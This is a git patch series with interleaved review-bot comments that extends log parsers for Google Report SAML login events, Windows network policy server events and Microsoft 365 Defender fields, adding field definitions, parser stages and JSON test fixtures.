+google.report.saml.status_code: + description: SAML response status + name: google.report.saml.status_code + type: keyword + +google.report.saml.initiator: + description: SAML requester of saml authentication + name: google.report.saml.initiator + type: keyword + +google.report.saml.application_name: + description: Saml SP application name + name: google.report.saml.application_name + type: keyword diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..6fa8c709a 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json 
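Review bot: The descriptions of the three new `google.report.saml.*` fields are inconsistent in case and phrasing (`SAML`, `saml`, `Saml`) and the `initiator` one is hard to read. Suggest `description: Status code of the SAML response`, `description: Party that initiated the SAML authentication (for example sp)` and `description: Name of the SAML service provider (SP) application`, which keeps the acronym capitalised throughout; the `sp` example is the value carried by the new test fixture.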
@@ -168,6 +168,120 @@ } ] }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + }, + { + "field": "google.report.saml.status_code" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + 
}, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..e00c5ee79 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -28,6 +28,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_saml_fields + filter: '{{ json_event.message.id.applicationName == "saml"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' 
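Review bot: Two of the six new entries are exact duplicates and one is unreachable if entries are matched in order: the `failed to log in using {network.application} service : {event.reason}` entry appears twice with identical conditions (the fourth and sixth new items), and the generic `successfully logged in by {network.application} service` entry carries the same four conditions as the more specific entry just above it (it still requires `google.report.saml.application_name`), so it can never be selected ahead of that one. The entries that interpolate `{event.reason}` also have no condition on `event.reason`, so a `login_failure` event whose `failure_type` parameter is missing would render with a blank reason. Suggest deleting the duplicate, dropping the `google.report.saml.application_name` condition from the generic success entry, and adding `{ "field": "event.reason" }` to the reason-bearing failure entry.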
@@ -258,3 +260,21 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_saml_fields: + actions: + - set: + event.category: ["authentication"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "device_id" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["allowed"] + filter: '{{ json_event.message.events[0].name == "login_success"}}' + + - set: + event.type: ["denied"] + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json new file mode 100644 index 000000000..a96c1fab6 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success.json 
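Review bot: `set_saml_fields` never sets `event.outcome`, although the success/failure distinction is exactly what the two filtered `set` blocks encode; ECS pairs `event.category: ["authentication"]` with `event.outcome`, and another parser in this series (the Wallix `session_integrity` fixture) already populates it. Adding `event.outcome: "success"` to the `login_success` block and `event.outcome: "failure"` to the `login_failure` block would let generic authentication detections match these events without knowing the Google-specific `event.action` values. Each `{% for param in ... %}` loop concatenates every parameter with the matching name and yields an empty string when none is present; presumably the engine drops empty values (TODO confirm), otherwise `device.id` and the `google.report.saml.*` fields would be set to `""` on events that lack them. `event.type: ["allowed"]`/`["denied"]` are the network-style types, whereas ECS lists `start`/`end`/`info` for the authentication category, so check which convention the other Google Report stages follow. The `stages:` mapping opens above this hunk.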
@@ -0,0 +1,63 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:26:15.515000Z", + "cloud": { + "account": { + "id": "C00000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, 
+ "related": { + "ip": [ + "2.1.3.2" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "2.1.3.2", + "ip": "2.1.3.2" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "10344515534360000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json new file mode 100644 index 000000000..94e5f299f --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json 
@@ -0,0 +1,63 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:24:58.191000Z", + "cloud": { + "account": { + "id": "C000000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS Client VPN", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + 
"application": "saml" + }, + "related": { + "ip": [ + "8.6.15.1" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "8.6.15.1", + "ip": "8.6.15.1" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "113844576558700000000", + "name": "John.doe" + } + } +} \ No newline at end of file From 49f05ead8e481396ef55f2e998ec6f1be38169d0 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 13 Nov 2024 16:00:13 +0100 Subject: [PATCH 12/84] feat(Windows): copy CallingStationID as source ip or source mac and copy AuthenticationServer as destination domain --- Windows/windows/ingest/parser.yml | 13 +++++++++++++ Windows/windows/tests/Event_6272.json | 9 +++++++++ Windows/windows/tests/Event_6273.json | 9 +++++++++ Windows/windows/tests/process_6272.json | 13 +++++++++++++ 4 files changed, 44 insertions(+) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index f0bd6640b..c34ff2684 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -164,6 +164,8 @@ pipeline: - name: dns_fields - name: action_target - name: destination + - name: set_network_policy_fields + filter: "{{ json.event.SourceName == 'Microsoft-Windows-Security-Auditing' and json.event.EventID in [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280]}}" - name: rule - name: finalize @@ -1150,6 +1152,17 @@ stages: source.address: "{{json_event.message.SourceAddr}}" filter: "{{json.event.SourceAddr | is_ipaddress}}" + set_network_policy_fields: + actions: + - set: + source.ip: "{{ json.event.CallingStationID }}" + filter: "{{json.event.CallingStationID | is_ipaddress}}" + - set: + source.mac: "{{ json.event.CallingStationID }}" + filter: "{{ final.source.ip == null }}" + - set: + destination.domain: "{{ json.event.AuthenticationServer }}" + rule: actions: - set: diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json index 4a3212af2..20213504d 100644 
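Review bot: `destination.domain` in the new `set_network_policy_fields` stage is filled from `AuthenticationServer` unconditionally, so when the attribute holds an IP address — the updated `process_6272.json` fixture in this same commit expects `"domain": "1.2.3.4"` — it lands in a domain field with no `destination.ip`, unlike the `source` side which branches on `is_ipaddress`. The `source.mac` fallback likewise accepts any non-IP string; NPS events appear to write a bare `-` when Calling-Station-ID is absent, which would then be stored as a MAC address, so the fallback filter should at least exclude empty and placeholder values. The rewrite below mirrors the source handling for the destination and tightens the MAC fallback; the pipeline-level stage filter is in the earlier hunk and is unchanged.

```yaml
set_network_policy_fields:
  actions:
    # … unchanged: source.ip action guarded by is_ipaddress …
    - set:
        source.mac: "{{ json.event.CallingStationID }}"
      filter: "{{ final.source.ip == null and json.event.CallingStationID not in [null, '', '-'] }}"
    - set:
        destination.ip: "{{ json.event.AuthenticationServer }}"
      filter: "{{ json.event.AuthenticationServer | is_ipaddress }}"
    - set:
        destination.domain: "{{ json.event.AuthenticationServer }}"
      filter: "{{ final.destination.ip == null }}"
```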
--- a/Windows/windows/tests/Event_6272.json +++ b/Windows/windows/tests/Event_6272.json @@ -42,6 +42,14 @@ "record_id": 1674356873, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json index 8ad5a2226..118cf2445 100644 --- a/Windows/windows/tests/Event_6273.json +++ b/Windows/windows/tests/Event_6273.json @@ -42,6 +42,14 @@ "record_id": 783949626, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json index af1d9fe1d..3135f15c9 100644 --- a/Windows/windows/tests/process_6272.json +++ b/Windows/windows/tests/process_6272.json @@ -42,6 +42,11 @@ "record_id": 2324634, "type": "Security" }, + "destination": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "size_in_char": 7 + }, "host": { "hostname": "test", "name": "test" @@ -63,12 +68,20 @@ }, "related": { "hosts": [ + "1.2.3.4", "test" ], + "ip": [ + "10.24.25.25" + ], "user": [ "testUser" ] }, + "source": { + "address": "10.24.25.25", + "ip": "10.24.25.25" + }, "user": { "domain": "NT01", "id": "S-1-5-21-1111111111-111111111-1111111111-1111", From 7c47ee4ee8a16e39ece3021bd65f19304c722bc8 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Wed, 13 Nov 2024 16:07:01 +0100 Subject: [PATCH 13/84] Apply linter --- Google Cloud/google-report/_meta/fields.yml | 24 +++++++++---------- Google Cloud/google-report/ingest/parser.yml | 6 ++--- .../tests/test_saml_login_success.json | 4 ++-- .../tests/test_saml_login_success_1.json | 4 ++-- 4 files changed, 19 insertions(+), 19 deletions(-) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index ad86f9169..ad9d8d0a7 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -33,14 +33,14 @@ google.report.parameters.visibility: name: google.report.parameters.visibility type: keyword -google.report.token.app_name: - description: Token authorization application name - name: google.report.token.app_name +google.report.saml.application_name: + description: Saml SP application name + name: google.report.saml.application_name type: keyword -google.report.token.type: - description: Token type - name: google.report.token.type +google.report.saml.initiator: + description: SAML requester of saml authentication + name: google.report.saml.initiator type: keyword google.report.saml.status_code: @@ -48,12 +48,12 @@ google.report.saml.status_code: name: google.report.saml.status_code type: keyword -google.report.saml.initiator: - description: SAML requester of saml authentication - name: google.report.saml.initiator +google.report.token.app_name: + description: Token authorization application name + name: google.report.token.app_name type: keyword -google.report.saml.application_name: - description: Saml SP application name - name: google.report.saml.application_name +google.report.token.type: + description: Token type + name: google.report.token.type type: keyword diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index e00c5ee79..3a0fce88f 100644 
--- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -269,12 +269,12 @@ stages: google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' - + - set: event.type: ["allowed"] filter: '{{ json_event.message.events[0].name == "login_success"}}' - + - set: event.type: ["denied"] event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' - filter: '{{ json_event.message.events[0].name == "login_failure"}}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json index a96c1fab6..8a9785816 100644 --- a/Google Cloud/google-report/tests/test_saml_login_success.json +++ b/Google Cloud/google-report/tests/test_saml_login_success.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + } }, "expected": { "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json index 94e5f299f..de8e102d7 100644 --- a/Google Cloud/google-report/tests/test_saml_login_success_1.json +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + } }, "expected": { "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", From 462382e15fa0254cb24676a97571ed0edadafc82 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Wed, 13 Nov 2024 16:14:34 +0100 Subject: [PATCH 14/84] Fix/Microsoft 365 Defender: Fix on process* fields --- .../microsoft-365-defender/_meta/fields.yml | 264 ++++++++++-------- .../microsoft-365-defender/ingest/parser.yml | 150 +++++++--- .../tests/test_device_event.json | 22 +- ...test_device_event_sensitive_file_read.json | 100 +++++++ ...vents_2.json => test_device_events_2.json} | 13 +- ...test_device_events_get_clipboard_data.json | 83 ++++++ ...test_device_events_powershell_command.json | 83 ++++++ ..._device_events_shell_link_create_file.json | 103 +++++++ .../tests/test_device_file_event.json | 24 +- .../tests/test_device_file_event_02.json | 109 ++++++++ .../tests/test_device_image_load_event.json | 10 +- .../tests/test_device_logon_events.json | 6 +- .../tests/test_device_network_events.json | 26 +- .../tests/test_device_process_created.json | 8 +- .../tests/test_device_process_events.json | 83 +++--- .../tests/test_device_process_events_2.json | 127 ++++++--- .../tests/test_device_registry_events.json | 24 +- .../test_devices_events_script_content.json | 13 +- .../tests/test_email_events.json | 22 +- .../tests/test_email_post_delivery.json | 2 +- .../tests/test_email_url_info.json | 22 +- .../tests/test_identity_directory.json | 22 +- .../tests/test_identity_info.json | 22 +- .../tests/test_identity_info_2.json | 2 +- .../tests/test_identity_logon.json | 22 +- .../tests/test_identity_query.json | 22 +- .../tests/test_local_ip.json | 22 +- .../tests/test_process_error.json | 54 ++-- 28 files changed, 1068 insertions(+), 392 deletions(-) create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json rename Microsoft/microsoft-365-defender/tests/{test_deivce_events_2.json => test_device_events_2.json} (98%) create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json create mode 100644 
Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index f69ef372d..0e6154ccd 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml 
@@ -133,78 +133,6 @@ action.properties.ISP: name: action.properties.ISP type: keyword -action.properties.InitiatingProcessAccountObjectId: - description: Azure AD object ID of the user account that ran the process responsible - for the event - name: action.properties.InitiatingProcessAccountObjectId - type: keyword - -action.properties.InitiatingProcessCommandLine: - description: Process commande Line that initiated the event - name: action.properties.InitiatingProcessCommandLine - type: keyword - -action.properties.InitiatingProcessFileSize: - description: Size of the process (image file) that initiated the event - name: action.properties.InitiatingProcessFileSize - type: long - -action.properties.InitiatingProcessIntegrityLevel: - description: Integrity level of the process that initiated the event. Windows assigns - integrity levels to processes based on certain characteristics, such as if they - were launched from an internet download. These integrity levels influence permissions - to resources - name: action.properties.InitiatingProcessIntegrityLevel - type: keyword - -action.properties.InitiatingProcessLogonId: - description: Identifier for a logon session of the process that initiated the event. - This identifier is unique on the same machine only between restarts. 
- name: action.properties.InitiatingProcessLogonId - type: keyword - -action.properties.InitiatingProcessTokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the process that initiated the event - name: action.properties.InitiatingProcessTokenElevation - type: keyword - -action.properties.InitiatingProcessVersionInfoCompanyName: - description: Company name from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoCompanyName - type: keyword - -action.properties.InitiatingProcessVersionInfoFileDescription: - description: Description from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoFileDescription - type: keyword - -action.properties.InitiatingProcessVersionInfoInternalFileName: - description: Internal file name from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoInternalFileName - type: keyword - -action.properties.InitiatingProcessVersionInfoOriginalFileName: - description: Original file name from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoOriginalFileName - type: keyword - -action.properties.InitiatingProcessVersionInfoProductName: - description: Product name from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoProductName - type: keyword - -action.properties.InitiatingProcessVersionInfoProductVersion: - description: Product version from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoProductVersion - type: keyword - action.properties.IsAdminOperation: description: 
Indicates whether the activity was performed by an administrator name: action.properties.IsAdminOperation 
@@ -353,51 +281,6 @@ action.properties.PreviousRegistryValueName: name: action.properties.PreviousRegistryValueName type: keyword -action.properties.ProcessIntegrityLevel: - description: Integrity level of the newly created process. Windows assigns integrity - levels to processes based on certain characteristics, such as if they were launched - from an internet downloaded. These integrity levels influence permissions to resources - name: action.properties.ProcessIntegrityLevel - type: keyword - -action.properties.ProcessTokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the newly created process - name: action.properties.ProcessTokenElevation - type: keyword - -action.properties.ProcessVersionInfoCompanyName: - description: Company name from the version information of the newly created process - name: action.properties.ProcessVersionInfoCompanyName - type: keyword - -action.properties.ProcessVersionInfoFileDescription: - description: Description from the version information of the newly created process - name: action.properties.ProcessVersionInfoFileDescription - type: keyword - -action.properties.ProcessVersionInfoInternalFileName: - description: Internal file name from the version information of the newly created - process - name: action.properties.ProcessVersionInfoInternalFileName - type: keyword - -action.properties.ProcessVersionInfoOriginalFileName: - description: Original file name from the version information of the newly created - process - name: action.properties.ProcessVersionInfoOriginalFileName - type: keyword - -action.properties.ProcessVersionInfoProductName: - description: Product name from the version information of the newly created process - name: action.properties.ProcessVersionInfoProductName - type: keyword - -action.properties.ProcessVersionInfoProductVersion: - description: Product version from the version information of the newly created process - name: 
action.properties.ProcessVersionInfoProductVersion - type: keyword - action.properties.Query: description: String used to run the query name: action.properties.Query 
